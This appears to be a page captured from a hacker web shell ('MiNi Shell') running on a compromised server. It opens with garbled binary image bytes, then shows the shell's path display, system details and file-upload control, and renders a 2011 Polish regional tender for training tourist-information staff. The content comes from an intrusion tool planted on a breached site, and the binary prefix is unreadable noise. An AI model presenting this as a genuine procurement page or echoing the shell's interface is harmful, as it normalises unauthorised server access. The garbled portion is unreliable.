JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110120/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110120/9684-N-2011.html

<p class="kh_header"><b>Gdańsk: Przeprowadzenie cyklu szkoleń dla pracowników  punktów Informacji Turystycznej w ramach projektu: Zintegrowany System Informacji Turystycznej Województwa Pomorskiego.</b><br>
<b>Numer ogłoszenia: 9684 - 2011; data zamieszczenia: 20.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorząd Województwa Pomorskiego , ul. Okopowa 21/27, 80-810 Gdańsk, woj. pomorskie, tel. 058 3261555, faks 058 3261556.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.woj-pomorskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie cyklu szkoleń dla pracowników  punktów Informacji Turystycznej w ramach projektu: Zintegrowany System Informacji Turystycznej Województwa Pomorskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: zorganizowanie i przeprowadzenie cyklu szkoleń dla pracowników i współpracowników Lokalnych Organizacji Turystycznych oraz innych instytucji zajmujących się informacją turystyczną w województwie pomorskim, będących Partnerami Zapewniającymi Ciągłość Przedsięwzięcia w projekcie Zintegrowany System Informacji Turystycznej Województwa Pomorskiego, realizowanym w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013.
2.	Zamówienie obejmuje:
a.	Szkolenie z tematyki dot. obsługi klienta-turysty, składające się z:

Szkolenie dwudniowe nr 1 - Profesjonalna Obsługa Turysty w punkcie informacji turystycznej

1 i 2 dzień -  Zasady profesjonalnej Obsługi Klienta-Turysty - warsztaty z kamerą video
Celem szkolenia będzie podniesienie kompetencji zawodowych pracowników Informacji Turystycznej i budowanie pozytywnego wizerunku destynacji oraz opanowanie zasad profesjonalnej obsługi turysty poprzez trening z kamerą wideo w zakresie programu, który obejmuje m.in.:
-	typologię klientów i dostosowanie do różnych stylów zachowań turysty;
-	narzędzia i techniki usprawniające obsługę turystów w punkcie informacji turystycznej;
-	zasady gromadzenia  i przekazywania informacji turystom;
-	zasady postępowania w sytuacjach trudnych;

Szkolenie dwudniowe  nr 2 - Profesjonalna komunikacja w punkcie informacji turystycznej
	
1 dzień - Rozmowa telefoniczna i komunikacja przez e-mail i serwisy społecznościowe w punkcie informacji turystycznej - wykłady  i warsztaty
2 dzień - Różnice międzykulturowe  i obsługa turystów zagranicznych - wykłady
i warsztaty
Celem 1 dnia szkolenia będzie rozwinięcie umiejętności w zakresie profesjonalnej telefonicznej i e-mailowej obsługi Turysty.
W wyniku szkolenia uczestnicy powinni:
-	poznać zasady i przeprowadzić profesjonalnie rozmowę telefoniczną z Turystą;
-	poznać zasady e-mailowej etykiety obsługi Turysty z praktycznymi ćwiczeniami ich zastosowania;
-	poznać reguły prowadzenia rozmów telefonicznych z Turystami w celu udzielenia rzetelnych informacji;
-	rozwinąć swoje umiejętności interpersonalne poprzez analizę nagrań rozmów telefonicznych i korespondencji mailowej.
Celem 2 dnia szkoleniowego będzie podniesienie kompetencji w zakresie komunikacji międzykulturowej i rozwinięcie umiejętności w zakres i obsługi turystów zagranicznych. Uczestnicy nabędą odpowiednie umiejętności komunikacji w środowisku interkulturowym, będą wiedzieli z czego wynikają różnice międzykulturowe, zdobędą wiedzę na temat różnic międzykulturowych, dowiedzą się jak unikać nieporozumień w komunikowaniu się.
Szkolenie należy przeprowadzić dla 50 osób podzielonych na 3 grupy (od 10 do 16-osobowe - łącznie każda grupa uczestniczyć będzie w 4 dniach szkoleniowych). Szkolenia należy zorganizować w 3 miejscowościach: w Tczewie, Gdyni oraz w Słupsku (z możliwością zorganizowania w innym miejscu pod warunkiem zapewniania transportu całej grupy z w/w miejscowości). Podziału osób zgłoszonych na poszczególne szkolenia i przypisania ich do poszczególnych miejscowości dokona Zamawiający. Imienny wykaz osób skierowanych na poszczególne szkolenia Zamawiający przekaże Wykonawcy na 5 dni przed rozpoczęciem całego cyklu szkoleń.
Szkolenie zakończone zostanie przekazaniem certyfikatu dla jego uczestników.

b.	Szkolenia z tematyki dot. obsługi Interaktywnego Systemu Informacji Turystycznej:
Szkolenie jednodniowe nr 3 - Prawa autorskie - wykłady 

W wyniku szkolenia uczestnicy powinni nauczyć się i poznać:
-	podstawowe pojęcia z zakresu prawa autorskiego: pojęcie prawa autorskiego, pola eksploatacji, licencje i przenoszenie praw, dozwolony użytek, prawo cytatu, akty prawne zawierające odniesienia do prawa autorskiego,
-	tematykę dotyczącą utworów prawa autorskiego;
-	tematykę dotyczącą wykorzystywania wizerunku innych osób w publikacjach i internecie,
-	tematykę dotyczącą artykułów prasowych i wypowiedzi zamieszczanych w środkach przekazu,
-	tematykę dotyczacą naruszania praw autorskich.

Szkolenie jednodniowe nr 4 - Sztuka copywritingu w turystyce w kontekście marketingu terytorialnego - wykłady i warsztaty

Zagadnienia powinny obejmować: formy tekstów a oczekiwania odbiorców-turystów; hasła, nagłówki, tytuły, leady - czyli jak zaciekawić czytelnika w pierwszych sekundach; styl tekstu czyli jakich błędów unikać.
Szkolenia i warsztaty mają przygotować osoby w regionie do opracowywania atrakcyjnych i inspirujących tekstów prezentowanych na regionalnym portalu turystycznym w ramach pomorskiego Interaktywnego Systemu Informacji Turystycznej (ISIT).

Szkolenie należy przeprowadzić dla 50 osób podzielonych na 3 grupy (od 10 do 16-osobowe - łącznie każda grupa uczestniczyć będzie w 2 dniach szkoleniowych). Szkolenia należy zorganizować w 3 miejscowościach: w Tczewie, Gdyni oraz w Słupsku (z możliwością zorganizowania w innym miejscu pod warunkiem zapewniania transportu całej grupy z w/w miejscowości). Podziału osób zgłoszonych na poszczególne szkolenia i przypisania ich do poszczególnych miejscowości dokona Zamawiający. Imienny wykaz osób skierowanych na poszczególne szkolenia Zamawiający przekaże Wykonawcy na 7 dni przed rozpoczęciem całego cyklu szkoleń.
Szkolenie zakończone zostanie przekazaniem certyfikatu dla jego uczestników.

c.	Ponadto w ramach przedmiotu zamówienia obowiązkiem Wykonawcy będzie także zorganizowanie dla wszystkich grup wymienionych w ppkt. b) dwóch dodatkowych dni szkoleniowych (łącznie każda grupa uczestniczyć będzie w 2 dodatkowych  dniach szkoleniowych), na których zajęcia prowadzić będzie przedstawiciel Zamawiającego (tematyką będzie planowanie i redagowanie treści wizerunkowych na potrzeby ISIT).
3.	Wykonawca opracuje merytorycznie i wydrukuje wszystkie materiały szkoleniowe, które oznaczy stosownymi informacjami, zgodnie z podręcznikiem Wytyczne dotyczące promocji projektów UE dla beneficjentów Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013. Ponadto Wykonawca wystawi certyfikat ukończenia szkoleń każdemu uczestnikowi.
4.	Jeden dzień szkoleniowy powinien obejmować minimum 6 godzin zegarowych (8 godzin lekcyjnych tj. 45-minutowych) zajęć.
5.	Wykonawca zapewni sale szkoleniowe o co najmniej następującym standardzie:
a.	Sala musi spełniać wszelkie wymogi BHP, sanitarne i przeciwpożarowe określone przepisami prawa,
b.	Sala musi być przystosowana do udziału w szkoleniu osób niepełnosprawnych - w tym poruszających się na wózkach inwalidzkich,
c.	Sala musi być wyposażona w co najmniej tyle miejsc siedzących ile przewidziano uczestników szkolenia,
d.	Sala w okresie zimowym musi być ogrzewana,
e.	Sala będzie spełniać wymogi akustyczne, oświetleniowe,
f.	Sala będzie posiadać zaplecze sanitarne,
g.	W sali znajdować się będzie co najmniej projektor multimedialny, laptop oraz ekran, kamera video - ( dotyczy szkoleń z kamerą wideo), flipchart, flamastry lub tablice tradycyjne; oraz musi posiadać dostęp do internetu na stanowisku pracy trenera,
h.	Sale położone we wskazanych przez Zamawiającego lokalizacjach,
i.	Sala szkoleniowa musi znajdować się w bezpośrednim dostępie do środków komunikacji publicznej,
j.	Sala szkoleniowa oraz miejsce wydawania obiadu musza znajdować się w tym samym budynku. Obiad musi być wydawany poza salą szkoleniową.
k.	Miejsca szkoleń muszą być oznaczone zgodnie z aktualnymi Wytycznymi dotyczącymi promocji projektów UE dla beneficjentów Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013.
6.	Wykonawca zapewni na każdy dzień szkolenia catering według liczby uczestników danego szkolenia. W ramach cateringu wymagane będzie jeden serwis kawowy oraz jeden gorący posiłek obiadowy jednodaniowy. Posiłki powinny być urozmaicone a także uwzględniać polską tradycję kulinarną.
7.	Terminy planowanych szkoleń powinny uwzględniać:
-	zorganizowanie dla każdej z 3 grup szkoleniowych pierwszego z dodatkowych zajęć szkoleniowych (łącznie 3 dni) prowadzonych przez przedstawiciela Zamawiającego z tematyki: planowanie i redagowanie treści wizerunkowych, w terminie do 21 marca 2011 r. Drugi dzień tych zajęć dla każdej z grup - łącznie 3 dni - powinny zostać zorganizowane w maju 2011r.
-	pozostałe szkolenia powinny zostać przeprowadzone do 17 czerwca 2011 r.
8.	Wykonawca zobowiązuje się do przedstawienia do akceptacji Zamawiającego szczegółowego programu każdego ze szkoleń przed jego przeprowadzeniem, w którym określona zostanie także liczba trenerów na poszczególnych szkoleniach w terminie 10 dni przed ich przeprowadzeniem.	
Zamawiający zastrzega sobie możliwość wprowadzenia zmian w szczegółowych programach szkoleń, nie później jednak niż na 5 dni po ich otrzymaniu.
9.	Wykonawca umożliwi Zamawiającemu hospitację zajęć.
10.	Wykonawca prowadzi dokumentację niezbędną do realizacji szkoleń (listy obecności, listy potwierdzające odbiór materiałów szkoleniowych, listy potwierdzające odbiór certyfikatów) według wzoru dostarczonego przez Zamawiającego na etapie realizacji umowy.	
Wykonawca przekaże protokołem odbioru pełną dokumentację z realizacji szkoleń do biura Departamentu Turystyki Urzędu Marszałkowskiego Województwa Pomorskiego, najpóźniej w ciągu 5 dni po zakończeniu szkolenia w ramach obszaru tematycznego przez daną grupę szkoleniową..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.52.20.00-9, 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia kwoty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek nie został opisany</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie zrealizował :
co najmniej trzy usługi polegające na przeprowadzeniu cyklu szkoleń z profesjonalnej obsługi klienta-turysty, których celem było podniesienie kompetencji zawodowych pracowników Informacji Turystycznej i budowanie pozytywnego wizerunku destynacji, rozwijanie umiejętności w zakresie profesjonalnej telefonicznej i e-mailowej obsługi Turysty, podniesienie kompetencji w zakresie komunikacji międzykulturowej i rozwijanie umiejętności w zakresie i obsługi turystów zagranicznych),
o łącznej wartości minimum 25 000 zł brutto, przeprowadzonych łącznie dla co najmniej 50 osób (przez wartość brutto usługi należy rozumieć wysokość honorarium uzyskanego przez wykonawcę za wykonanie tej usługi).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek nie został opisany</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek udziału w postępowaniu zostanie spełniony, gdy Wykonawca wykaże, że dysponuje:
-	co najmniej dwiema osobami, z których każda posiada doświadczenie w zakresie przeprowadzania co najmniej 2 szkoleń, w tym co najmniej jednego w formie warsztatowej w okresie ostatnich 3 lat z zakresu profesjonalnej obsługi klienta-turysty dla pracowników i współpracowników instytucji zajmujących się informacją turystyczną, w łącznej liczbie minimum 50 godz. szkoleniowych
-	min. 1 osobą, która posiada doświadczenie praktyczne w zakresie pracy w punkcie informacji turystycznej przez minimum 2 lata, 
-	min. 1 osobą posiadającą doświadczenie w zakresie przeprowadzania szkoleń z zakresu copywritingu (tzn. pisania i redagowania artykułów do stron internetowych oraz materiałów promocyjnych) i marketingu terytorialnego w okresie ostatnich 3 lat,
-	min. 1 osobą posiadającą wykształcenie prawnicze i minimum trzyletnie doświadczenie zawodowe w zakresie prawa.
Zespół szkoleniowy realizujący szkolenia powinien liczyć min. 4 osoby.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek nie został opisany</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia  lub zdolnościach  finansowych  innych podmiotów, nie zależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany istotnych postanowień umowy mogą dotyczyć terminów wykonania pod warunkiem że zmiany te nie spowodują zwiększenia kosztów realizacji zamówienia.
2.	Zmiany, o których mowa w pkt. 1 mogą nastąpić jedynie w uzasadnionych przypadkach, 
w szczególności:
1)	 w zakresie pkt. 1 ( termin wykonania) w przypadku wystąpienia siły wyższej termin wykonania zamówienia umowy może ulec przedłużeniu o okres trwania przeszkody uniemożliwiającej realizację szczegółowego zamówienia. Pod pojęciem siły wyższej Zamawiający rozumie okoliczności, które pomimo zachowania należytej staranności są nieprzewidywalne oraz którym nie można zapobiec lub przeciwstawić się skutecznie. O braku możliwości dotrzymania terminu Wykonawca obowiązany jest niezwłocznie powiadomić Zamawiającego, określając jednocześnie nowy termin realizacji zamówienia.
2)	Zamawiający dopuszcza możliwość zmiany terminu realizacji zamówienia na pisemny wniosek Wykonawcy, o ile konieczność wprowadzenia takiej zmiany jest następstwem szczególnych okoliczności nie leżących po stronie Wykonawcy. Ocena, czy zachodzą szczególne okoliczności oraz czas przedłużenia terminu należy wyłącznie do Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.woj-pomorskie.pl w Biuletynie Informacji Publicznej Zamowienia Publiczne i Ogloszenia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Wojewodztwa Pomorskiego w Gdańsku, ul. Okopowa 21/27A, , pok. 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2011 godzina 11:30, miejsce: Urząd Marszalkowski Wojewodztwa Pomorskiego w Gdańsku, ul. Okopowa 21/27A, Kancelaria Ogólna, pok 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego oraz budżetu samorządu Województwa Pomorskiego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com